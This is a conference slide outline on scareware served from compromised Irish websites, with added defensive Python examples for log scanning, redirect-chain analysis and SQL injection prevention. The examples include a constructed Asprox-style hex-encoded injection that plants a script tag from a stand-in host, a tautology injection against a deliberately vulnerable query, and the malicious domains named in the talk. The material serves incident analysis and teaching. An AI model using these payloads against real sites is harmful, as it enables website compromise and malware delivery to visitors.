Scare Ware From Ireland
Presentation at the 2009 IRISS Cyber Crime conference on how Irish websites were compromised to host malicious software

  1. Scareware From Ireland
     Mark Hillick, IrissCert Incident Handler
     http://www.iriss.ie
     mark.hillick@iriss.ie
     Scareware From Ireland - Twitter "markofu" & "irisscert" © 2009 IRISS
  2. What is Scareware?
  3. Irish Scareware Exploit
     Browse to Irish website & collect your fake anti-virus
  4. Dialog-box fun…..
  5. Dialog-box fun cont…..
  6. System Scan
  7. Trojan Log file
  8. Money, Money please!
  9. Are you sure?
  10. Are you mad????
  11. BSOD
  12. Effect on the end-user….
  13. Exploit
     • Exploited sites hosted on one server
     • Microsoft FTPd & IIS 6.0
     • Two most popular web site attacks –
       • Gumblar – PHP sites
       • Asprox – SQL injection
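The slide names Asprox, whose mass SQL-injection campaigns against ASP/IIS sites hid the injected T-SQL inside a hex literal handed to CAST(... AS VARCHAR/NVARCHAR) and then ran it with EXEC, so the script tag that ends up in every text column never appears in clear text in the web log. The Python below is an added example, not material from the presentation: it scans constructed IIS 6.0 W3C log lines (the requests, client address and the injected script URL are made up for illustration) for that shape and decodes the hex so an analyst can see what was actually executed.

```python
import re
from urllib.parse import unquote

# Constructed sample data (not from the incident): a benign request followed by
# an Asprox-style request whose T-SQL is hidden in a hex literal passed to CAST.
# The script URL is a hypothetical placeholder.
INJECTED_SQL = "UPDATE news SET body=body+'<script src=http://evil.example/x.js></script>'"
HEX_PAYLOAD = "0x" + INJECTED_SQL.encode("ascii").hex().upper()

IIS_LOG = (
    "#Software: Microsoft Internet Information Services 6.0\n"
    "#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port c-ip cs(User-Agent) sc-status\n"
    "2009-06-10 14:22:30 10.0.0.5 GET /news.asp id=12 80 203.0.113.7 Mozilla/4.0 200\n"
    "2009-06-10 14:22:31 10.0.0.5 GET /news.asp "
    f"id=12;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST({HEX_PAYLOAD}%20AS%20VARCHAR(4000));EXEC(@S);-- "
    "80 203.0.113.7 Mozilla/4.0 200\n"
)

# CAST(0x... AS VARCHAR(n)) or NVARCHAR(n): the hex literal is the hidden statement.
CAST_HEX = re.compile(r"CAST\s*\(\s*0x([0-9A-Fa-f]+)\s+AS\s+(N?)VARCHAR", re.IGNORECASE)


def decode_hex_sql(hex_digits: str, is_nvarchar: bool) -> str:
    """Turn the hex literal back into the T-SQL the server would have run."""
    raw = bytes.fromhex(hex_digits)
    # NVARCHAR literals carry UTF-16LE text; VARCHAR literals are single-byte.
    return raw.decode("utf-16-le" if is_nvarchar else "latin-1", errors="replace")


def scan_iis_log(log_text: str) -> list:
    """Return one record per request whose query string carries a hex-encoded CAST payload."""
    hits = []
    fields = []
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]        # column names for the lines that follow
            continue
        if not line or line.startswith("#"):
            continue
        cols = line.split()                  # IIS replaces spaces inside fields with '+'
        if len(cols) != len(fields):
            continue
        row = dict(zip(fields, cols))
        query = unquote(row.get("cs-uri-query", ""))   # undo %20 etc. before matching
        m = CAST_HEX.search(query)
        if not m:
            continue
        hits.append({
            "time": f"{row['date']} {row['time']}",
            "client": row["c-ip"],
            "uri": row["cs-uri-stem"],
            "decoded_sql": decode_hex_sql(m.group(1), m.group(2).upper() == "N"),
        })
    return hits


if __name__ == "__main__":
    for h in scan_iis_log(IIS_LOG):
        print(h["time"], h["client"], h["uri"])
        print("  decoded:", h["decoded_sql"])
```

The decode step matters more than the regex: a hit tells you someone tried, but only the decoded statement tells you which table and column to check in the recovery phase.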
  14. Pass the Parcel: http://compromisedsite.ie
     • http://jobstopfil.biz http://poppka.net
     • http://sujetline.ru
     • http://grownclubfest.ru
     • PDF & SWF files served back
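The Python below is an added example, not code from the presentation: it walks a constructed capture of the kind of redirect chain the slide calls "pass the parcel", the way an analyst would reconstruct it from a Burp or Tamper Data session without ever letting a browser execute any of it. The hostnames are the ones on the slide; the paths, response bodies, hop order and the injected iframe/script tags are assumptions made for the demonstration. The check a practitioner wants is at the end of the chain: the served file is identified from its leading bytes, because the Content-Type header (here claiming text/html for a PDF) is under the attacker's control.

```python
import re
from urllib.parse import unquote, urlsplit

# Constructed capture (not the incident's real traffic): url -> (status, headers, body).
# Hostnames are from the slide; paths, bodies and hop order are hypothetical.
CAPTURE = {
    "http://compromisedsite.ie/index.php": (200, {"Content-Type": "text/html"},
        b"<html><body>Welcome\n"
        b"<iframe src=\"http://jobstopfil.biz/go\" width=1 height=1></iframe></body></html>"),
    "http://jobstopfil.biz/go": (302, {"Location": "http://poppka.net/x"}, b""),
    "http://poppka.net/x": (200, {"Content-Type": "text/html"},
        b"<html><script src=\"http://sujetline.ru/a.js\"></script></html>"),
    "http://sujetline.ru/a.js": (200, {"Content-Type": "application/javascript"},
        b"document.write(unescape('%3Ciframe%20src%3D%22http%3A//grownclubfest.ru/load.php%22%3E'));"),
    "http://grownclubfest.ru/load.php": (200, {"Content-Type": "text/html"},   # header lies
        b"%PDF-1.4\n%\xe2\xe3\xcf\xd3\n1 0 obj\n<< /Type /Catalog >>\nendobj\n"),
}

# src="..." of an iframe or script tag, quoted or not.
SRC_ATTR = re.compile(r"<(?:iframe|script)[^>]*\bsrc\s*=\s*[\"']?([^\"' >]+)", re.IGNORECASE)


def classify_payload(body: bytes) -> str:
    """Identify the served file by its magic bytes, not by the Content-Type header."""
    if body.startswith(b"%PDF"):
        return "pdf"
    if body[:3] in (b"FWS", b"CWS", b"ZWS"):      # uncompressed / zlib / LZMA Flash
        return "swf"
    if body.startswith(b"MZ"):
        return "pe"
    return "other"


def next_hop(url: str, status: int, headers: dict, body: bytes):
    """Return the next URL in the chain, or None when this response is terminal."""
    if 300 <= status < 400 and "Location" in headers:
        return headers["Location"]
    text = body.decode("latin-1")
    # Static unpacking of the common unescape('%3C...') trick; no JavaScript is executed.
    if "unescape(" in text:
        text = unquote(text)
    m = SRC_ATTR.search(text)
    if m:
        target = m.group(1)
        # Only follow a reference that leaves the current host.
        if urlsplit(target).netloc and urlsplit(target).netloc != urlsplit(url).netloc:
            return target
    return None


def follow_chain(capture: dict, start: str, max_hops: int = 10) -> list:
    """Walk the capture from `start`, recording every hop and what it served."""
    chain, url = [], start
    while url and len(chain) < max_hops:
        if url not in capture:
            chain.append({"url": url, "status": None, "note": "not in capture"})
            break
        status, headers, body = capture[url]
        chain.append({"url": url, "status": status,
                      "content_type": headers.get("Content-Type"),
                      "payload": classify_payload(body)})
        url = next_hop(url, status, headers, body)
    return chain


if __name__ == "__main__":
    for hop in follow_chain(CAPTURE, "http://compromisedsite.ie/index.php"):
        print(hop)
```

With a real capture you would load the dictionary from the proxy's saved session; the walker itself does not need network access, which is the point when the final hop hands back an exploit document.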
  15. Obfuscation
     • Engaged SANS ISC Malware Team
     • Heavily obfuscated JavaScript
     • Used techniques not seen before
  16. Complex Design….
  17. Tools Used
     • Tamper Data, Live HTTP Headers – Firefox
     • Burp Suite
     • Tcpdump, Wireshark & Netwitness
     • Dig/nslookup
  18. Incident Handling - Containment
     (Image source: http://www.tazworld.co.uk/gallery/pictures/www.tazworld.co.uk_taz_035.gif © Warner Bros. Entertainment Inc.)
  19. Incident Handling - Eradication
     (Image source: http://www.alexross.com/CJ011.jpg © Warner Bros. Entertainment Inc.)
  20. Incident Handling - Recovery
     (Dilbert ©2009, United Feature Syndicate, Inc.)
  21. Incident Handling - Lessons Learned
     • Patch web-server & application
     • Input validation
     • Close unnecessary open ports (e.g. FTP)
     • Password policy
     • Regular back-ups
     • Web-app security testing
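"Input validation" on the slide is the application-level control that stops an Asprox-style request before it reaches the database. As an added illustration that is not part of the presentation, the Python below puts a string-concatenated query beside its parameterised form and adds an allow-list check for numeric identifiers, using an in-memory SQLite table with constructed rows. The injection shown is a generic tautology, not the campaign's payload; the lesson is the same for any engine.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample table; the rows are made up for the demonstration."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT, body TEXT)")
    conn.executemany(
        "INSERT INTO news (title, body) VALUES (?, ?)",
        [("Budget 2009", "..."), ("Storm warning", "..."), ("Match report", "...")],
    )
    conn.commit()
    return conn


def find_news_vulnerable(conn: sqlite3.Connection, title: str) -> list:
    """The pattern that gets exploited: request data spliced into SQL text."""
    sql = "SELECT id, title FROM news WHERE title = '" + title + "'"
    return conn.execute(sql).fetchall()


def find_news_safe(conn: sqlite3.Connection, title: str) -> list:
    """Parameterised form: the driver sends the value separately, it can never become grammar."""
    return conn.execute("SELECT id, title FROM news WHERE title = ?", (title,)).fetchall()


def is_valid_id(value: str) -> bool:
    """Allow-list check for an id parameter: digits only, bounded length.
    Rejects 'id=12;DECLARE ...'-style values outright instead of trying to strip them."""
    return value.isdigit() and 0 < len(value) <= 9


def get_news_by_id(conn: sqlite3.Connection, raw_id: str):
    """Validate first, then bind: both controls together."""
    if not is_valid_id(raw_id):
        return None
    return conn.execute("SELECT id, title FROM news WHERE id = ?", (int(raw_id),)).fetchone()


if __name__ == "__main__":
    db = make_db()
    attack = "x' OR '1'='1"
    print("vulnerable:", find_news_vulnerable(db, attack))   # every row comes back
    print("safe:      ", find_news_safe(db, attack))          # no row has that literal title
    print("by id:     ", get_news_by_id(db, "2"), get_news_by_id(db, "12;DECLARE @S VARCHAR(4000)"))
```

Validation and parameterisation are complementary rather than alternatives: the allow-list rejects obviously hostile input early and cheaply, while the bound parameter guarantees that whatever does get through is treated as data.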
  22. Securing the Desktop: End-User Defence
     • Rescue CDs: Google -> "rescue site:raymond.cc"
     • Free Tools: http://zeltser.com/fighting-malicious-software/
  23. Next Steps & Extra Info
     • SANS GCIH Gold Paper
       • Scareware & its evolution
       • Incident Handling Process
       • Full Incident Report
     • http://www.iriss.ie – in shared documents
     • http://www.hillick.net/things/scareware.doc
  24. References
     • Sunbelt Blog
     • Dancho Danchev Blog
     • SANS ISC (Thanks to @bojanz)
     • VRT-Sourcefire Blog
     • Symantec White Papers
     • SANS Forensics Blog
  25. That's it.....
     Hat tip for image - Jesse M. Heines - http://teaching.cs.uml.edu/~heines/images/questions.gif